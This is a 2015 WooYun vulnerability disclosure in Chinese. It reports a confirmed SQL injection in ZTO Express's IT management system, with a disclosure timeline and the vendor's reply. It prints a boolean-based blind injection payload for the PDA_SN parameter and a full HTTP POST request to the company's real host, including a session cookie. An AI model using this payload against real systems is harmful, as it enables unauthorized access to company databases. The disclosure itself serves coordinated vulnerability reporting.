缺陷编号:WooYun-2015-0120461
漏洞标题:中通速递IT管理系统SQL注入漏洞
相关厂商:中通速递
漏洞作者:专业种田
提交时间:2015-06-14 19:16
公开时间:2015-07-30 09:12
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
2015-06-14: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经确认,细节仅向厂商公开
2015-06-25: 细节向核心白帽子及相关领域专家公开
2015-07-05: 细节向普通白帽子公开
2015-07-15: 细节向实习白帽子公开
2015-07-30: 细节向公众公开
RT
1 2 3 4 5 |
Place: POST<br> Parameter: PDA_SN<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: PDA_Type=&PDA_SN=X30013040448' AND 1496=1496 AND 'MmCo'='MmCo&pager.pageNo=1&pager.pageSize=20&sort=USE_SITE&direction=desc |
1 2 3 4 5 6 7 8 9 10 11 12 13 |
POST /BaQiangWangDian/getBaQiangOfPager HTTP/1.1<br> Host: it.zt-express.com<br> Proxy-Connection: keep-alive<br> Content-Length: 91<br> Accept: application/json, text/javascript, */*; q=0.01<br> Origin: http://it.zt-express.com<br> X-Requested-With: XMLHttpRequest<br> User-Agent:<br> Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br> Referer: http://it.zt-express.com/Views/BaQiang/BaQiangWangDian.aspx<br> Accept-Encoding: gzip, deflate<br> Accept-Language: zh-CN,zh;q=0.8,en;q=0.6<br> Cookie: ASP.NET_SessionId=o0rlyixrhhpc4z1q5cbjgu1bPDA_Type=&PDA_SN=X30013040448&pager.pageNo=1&pager.pageSize=20&sort=USE_SITE&direction=desc |
注入参数 :PDA_SN
跑数据有点慢
sql过滤
危害等级:中
漏洞Rank:10
确认时间:2015-06-1509:11
感谢白帽子的热切关注,开发人员紧急处理中。
暂无
原文连接
的情况下转载,若非则不得使用我方内容。